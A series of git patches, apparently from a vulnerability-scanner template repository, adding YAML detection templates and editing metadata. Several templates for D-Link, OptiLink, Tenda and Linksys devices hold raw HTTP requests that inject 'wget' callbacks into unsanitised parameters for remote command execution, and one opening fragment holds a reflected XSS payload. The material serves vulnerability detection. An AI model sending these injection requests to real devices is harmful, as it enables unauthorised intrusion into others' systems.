+requests: + - method: GET + path: + - '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From a3699d912a2df739e796877ce6109c3b905b5281 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 14:28:14 +0900 Subject: [PATCH 0616/4083] Create CVE-2020-25506.yaml The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-25506.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2020/CVE-2020-25506.yaml diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml new file mode 100644 index 0000000000..21a5709c95 --- /dev/null +++ b/cves/2020/CVE-2020-25506.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-25506 + +info: + name: D-Link DNS-320 - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + reference: | + - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 + - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ + tags: cve,cve2020,dlink,rce + +requests: + - raw: + - | + POST /cgi-bin/system_mgr.cgi? HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` + + - | + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + unsafe: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 1eb999ce02d5cc8fd72cd9647d141f1dc7ac866c Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 14:57:34 +0900 Subject: [PATCH 0617/4083] Create optiLink-ont1gew-gpon-rce.yaml vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim --- .../other/optiLink-ont1gew-gpon-rce.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml diff --git a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml new file mode 100644 index 0000000000..799426dc22 --- /dev/null +++ b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml @@ -0,0 +1,35 @@ +id: optiLink-ont1gew-gpon-rce + +info: + name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution + author: gy741 + severity: critical + description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device. + reference: | + - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: optiLink,rce,oob + +requests: + - raw: + - | + POST /boaform/admin/formTracert HTTP/1.1 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Origin: http://{{Hostname}} + Connection: keep-alive + Referer: http://{{Hostname}}/diag_ping_admin_en.asp + Upgrade-Insecure-Requests: 1 + Host: {{Hostname}} + User: e8c + Password: e8c + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + + target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 1c729ab1ea5c4f2480a2d3088e22611613cd1e74 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 15:09:26 +0900 Subject: [PATCH 0618/4083] Create CVE-2021-31755.yaml Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-31755.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-31755.yaml diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml new file mode 100644 index 0000000000..d1d4550b3f --- /dev/null +++ b/cves/2021/CVE-2021-31755.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-31755 + +info: + name: Tenda Router AC11 RCE + description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + author: gy741 + severity: critical + reference: | + - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: cve,cve2021,tenda,rce,oob + +requests: + - raw: + - | + POST /goform/setmac HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/index.htmlr + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + Content-Type: application/x-www-form-urlencoded + + module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 69b04c8a988d2f36b104ff05b2014e73b2dc16a8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Jul 2021 13:51:19 +0530 Subject: [PATCH 0619/4083] Update wordpress-updraftplus-pem-key.yaml --- vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml b/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml index b254ea89b7..4f26b1dc53 100644 --- a/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml +++ b/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml @@ -3,7 +3,7 @@ id: updraftplus-pem-keys info: name: UpdraftPlus Plugin Pem Key author: dhiyaneshDk - severity: medium + severity: info reference: https://www.exploit-db.com/ghdb/6437 tags: wordpress From 525ffdefccc50a205700a782375c8139f244098b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Jul 2021 13:52:06 +0530 Subject: [PATCH 0620/4083] Update unauthenticated-popup-upload.yaml --- misconfiguration/unauthenticated-popup-upload.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauthenticated-popup-upload.yaml b/misconfiguration/unauthenticated-popup-upload.yaml index 8b420c0353..5234018c6e 100644 --- a/misconfiguration/unauthenticated-popup-upload.yaml +++ b/misconfiguration/unauthenticated-popup-upload.yaml @@ -3,7 +3,7 @@ id: unauthenticated-popup-upload info: name: Unauthenticated Popup File Uploader author: DhiyaneshDk - severity: low + severity: info reference: https://www.exploit-db.com/ghdb/6671 tags: fileupload From 887e7bcfabe42060365397b5f317095bd4be3fa8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:13:25 +0530 Subject: [PATCH 0621/4083] Update wordpress-updraftplus-pem-key.yaml --- vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml b/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml index 4f26b1dc53..90f297f2fa 100644 --- a/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml +++ b/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: info reference: https://www.exploit-db.com/ghdb/6437 - tags: wordpress + tags: wordpress,wp-plugin requests: - method: GET From 2f41c4de62debc9f91a701280f56388838eb795d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:15:49 +0530 Subject: [PATCH 0622/4083] Update CVE-2021-24298.yaml --- cves/2021/CVE-2021-24298.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml index 11327ee276..b57d43a804 100644 --- a/cves/2021/CVE-2021-24298.yaml +++ b/cves/2021/CVE-2021-24298.yaml @@ -4,6 +4,7 @@ info: name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298 tags: cve,cve2021,wordpress,xss,wp-plugin From caa5ceecca340b896bebacb7ad66941ede4ababd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:16:52 +0530 Subject: [PATCH 0623/4083] Update CVE-2015-9480.yaml --- cves/2015/CVE-2015-9480.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml index 4508aab2d3..92c272b706 100644 --- a/cves/2015/CVE-2015-9480.yaml +++ b/cves/2015/CVE-2015-9480.yaml @@ -7,7 +7,7 @@ info: reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://www.exploit-db.com/exploits/37252 - tags: cve,cve2015,wordpress,wp-plugin + tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET From 5cab7d67e40a54fd4a48f958c58bc05ddd81c1c0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:20:03 +0530 Subject: [PATCH 0624/4083] Update CVE-2011-1669.yaml --- cves/2011/CVE-2011-1669.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2011/CVE-2011-1669.yaml b/cves/2011/CVE-2011-1669.yaml index a004a892bc..1a448f5a9a 100644 --- a/cves/2011/CVE-2011-1669.yaml +++ b/cves/2011/CVE-2011-1669.yaml @@ -4,6 +4,7 @@ info: name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) author: daffainfo severity: high + description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 - https://www.exploit-db.com/exploits/17119 From c20a208c4a47db2af1d79a1d30b2a4946164ceb9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:20:42 +0530 Subject: [PATCH 0625/4083] Update CVE-2019-9618.yaml --- cves/2019/CVE-2019-9618.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index de167e65af..a04b19cf92 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI) author: daffainfo severity: high + description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 From fb1f67ce26b0176e87ccc0ceb861d178c31ab398 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:21:17 +0530 Subject: [PATCH 0626/4083] Rename CVE-2016-10960.yaml to cves/2016/CVE-2016-10960.yaml --- CVE-2016-10960.yaml => cves/2016/CVE-2016-10960.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename CVE-2016-10960.yaml => cves/2016/CVE-2016-10960.yaml (100%) diff --git a/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml similarity index 100% rename from CVE-2016-10960.yaml rename to cves/2016/CVE-2016-10960.yaml From 7a1e276d7b5eb0ffd12d96bb498965b3c9f32b73 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:27:55 +0530 Subject: [PATCH 0627/4083] Update CVE-2021-24335.yaml --- cves/2021/CVE-2021-24335.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml index ee84edbae4..ea7b58161e 100644 --- a/cves/2021/CVE-2021-24335.yaml +++ b/cves/2021/CVE-2021-24335.yaml @@ -4,6 +4,7 @@ info: name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335 tags: cve,cve2021,wordpress,xss,wp-plugin From 75c7fa04e396119f6f4b9428d9b711a946634722 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:28:58 +0530 Subject: [PATCH 0628/4083] Update CVE-2014-4513.yaml --- cves/2014/CVE-2014-4513.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2014/CVE-2014-4513.yaml b/cves/2014/CVE-2014-4513.yaml index ffde70494d..dfcae28193 100644 --- a/cves/2014/CVE-2014-4513.yaml +++ b/cves/2014/CVE-2014-4513.yaml @@ -4,6 +4,7 @@ info: name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513 tags: cve,cve2014,wordpress,xss,wp-plugin From 799e7109c3b08e5a26c3eec5334bfa2bfad0e28f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:30:23 +0530 Subject: [PATCH 0630/4083] Update CVE-2021-24389.yaml --- cves/2021/CVE-2021-24389.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml index eb76e1a472..e8b37ed246 100644 --- a/cves/2021/CVE-2021-24389.yaml +++ b/cves/2021/CVE-2021-24389.yaml @@ -4,6 +4,7 @@ info: name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389 tags: cve,cve2021,wordpress,xss,wp-plugin From a7b69d34f5edbfe28b8fb3164dc80897af602eda Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:31:25 +0530 Subject: [PATCH 0631/4083] Update CVE-2012-4273.yaml --- cves/2012/CVE-2012-4273.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-4273.yaml b/cves/2012/CVE-2012-4273.yaml index f0e1758ce3..db31bfa338 100644 --- a/cves/2012/CVE-2012-4273.yaml +++ b/cves/2012/CVE-2012-4273.yaml @@ -4,6 +4,7 @@ info: name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 tags: cve,cve2012,wordpress,xss,wp-plugin From e761c2b629ed1efa1e8dd14bd29826a27f0d8467 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 09:02:27 +0000 Subject: [PATCH 0632/4083] Auto Update README [Thu Jul 15 09:02:27 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a2a5e2ef24..263cee6973 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 415 | vulnerabilities | 229 | exposed-panels | 200 | +| cves | 417 | vulnerabilities | 229 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1531 files**. +**127 directories, 1533 files**. From fbc3367bb526347e4179cffb652acb92d083d7c5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 09:03:59 +0000 Subject: [PATCH 0633/4083] Auto Update README [Thu Jul 15 09:03:59 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 263cee6973..77c06c08d2 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 417 | vulnerabilities | 229 | exposed-panels | 200 | +| cves | 419 | vulnerabilities | 229 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1533 files**. +**127 directories, 1535 files**. From 7cecd5aa3e54c44dcf2e741e8122e5e282cdc788 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:34:40 +0530 Subject: [PATCH 0634/4083] Update wp-custom-tables-xss.yaml --- vulnerabilities/wordpress/wp-custom-tables-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index 625826efba..d29132cf89 100644 --- a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -4,6 +4,7 @@ info: name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) author: daffainfo severity: medium + description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability reference: https://www.securityfocus.com/bid/54326/info tags: wordpress,xss,wp-plugin From 48b4fa70a86648766eb62d05c7dda5f0836a04c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 09:07:08 +0000 Subject: [PATCH 0635/4083] Auto Update README [Thu Jul 15 09:07:08 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 77c06c08d2..9fbb967a64 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 419 | vulnerabilities | 229 | exposed-panels | 200 | +| cves | 421 | vulnerabilities | 229 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1535 files**. +**127 directories, 1537 files**. From f8f9f539eaff7a24b30af2aa2404e0b1f76230ec Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 18:10:11 +0900 Subject: [PATCH 0636/4083] Create CVE-2020-35713.yaml Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-35713.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-35713.yaml diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml new file mode 100644 index 0000000000..7e3e77e0b3 --- /dev/null +++ b/cves/2020/CVE-2020-35713.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-35713 + +info: + name: Linksys RE6500 Pre-Auth RCE + author: gy741 + severity: critical + reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html + description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + tags: cve,cve2020,linksys,rce,oob + +requests: + - raw: + - | + POST /goform/setSysAdm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/login.shtml + + admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1 + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From d00d4f37f515e3781cc26c1e5b6192eefe515897 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:43:35 +0530 Subject: [PATCH 0637/4083] Update CVE-2021-24320.yaml --- cves/2021/CVE-2021-24320.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml index 20d6a12131..42d961669c 100644 --- a/cves/2021/CVE-2021-24320.yaml +++ b/cves/2021/CVE-2021-24320.yaml @@ -4,6 +4,7 @@ info: name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320 tags: cve,cve2021,wordpress,xss,wp-plugin From 158d51b65e695467f42cbf4a324b6fbf0bba2ca0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 09:21:56 +0000 Subject: [PATCH 0638/4083] Auto Update README [Thu Jul 15 09:21:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9fbb967a64..ea9b7bddb8 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 421 | vulnerabilities | 229 | exposed-panels | 200 | +| cves | 422 | vulnerabilities | 229 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1537 files**. +**127 directories, 1538 files**. From 7c6785f6e497874b1c186241d7cccc4091872ec2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 09:24:04 +0000 Subject: [PATCH 0639/4083] Auto Update README [Thu Jul 15 09:24:04 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ea9b7bddb8..4a69d15157 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 422 | vulnerabilities | 229 | exposed-panels | 200 | +| cves | 423 | vulnerabilities | 230 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1538 files**. +**127 directories, 1540 files**. From 6ba86002828b1185812b042ea2a01ad0ed24753c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:54:35 +0530 Subject: [PATCH 0640/4083] Update CVE-2011-5106.yaml --- cves/2011/CVE-2011-5106.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2011/CVE-2011-5106.yaml b/cves/2011/CVE-2011-5106.yaml index d1855beed3..a17da7fc2f 100644 --- a/cves/2011/CVE-2011-5106.yaml +++ b/cves/2011/CVE-2011-5106.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106 tags: cve,cve2011,wordpress,xss,wp-plugin From a13090dd4bf6706f241bfc33fb7e839162d653c9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:01:21 +0530 Subject: [PATCH 0641/4083] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 284837442b..8bb63f3f98 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835 tags: cve,cve2012,wordpress,xss,wp-plugin From f1e1381451377d34160d382823dfe799a01d4837 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 09:34:34 +0000 Subject: [PATCH 0642/4083] Auto Update README [Thu Jul 15 09:34:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4a69d15157..da3bc2e3f6 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 423 | vulnerabilities | 230 | exposed-panels | 200 | +| cves | 424 | vulnerabilities | 230 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | 